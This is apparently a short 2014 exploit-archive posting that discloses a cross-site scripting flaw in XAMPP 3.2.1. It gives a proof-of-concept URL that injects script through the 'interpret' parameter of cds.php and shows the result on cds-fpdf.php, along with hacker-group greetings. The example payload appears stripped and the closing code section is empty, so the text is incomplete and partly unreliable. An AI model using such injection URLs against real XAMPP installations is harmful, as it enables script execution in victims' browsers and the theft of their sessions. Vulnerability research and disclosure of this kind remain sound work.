#Title : XAMPP 3.2.1 Cross Site Scripting #Author : DevilScreaM #Date : 15 January 2014 #Category : Web Applications #Vendor : http://sourceforge.net/projects/xampp #Version : 3.2.1 #Type : PHP #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Tested : Mozila, Chrome, Opera -> Windows #Vulnerabillity : Cross Site Scripting Cross Site Scripting Exploit & POC http://localhost/xampp/cds.php?interpret=[YOUR_XSS]&titel=title&jahr=title Example http://localhost/xampp/cds.php?interpret=

DevilScreaM

&titel=title&jahr=title View Cross Site Scripting at http://localhost/xampp/cds-fpdf.php Vulnerabillity at Code : : :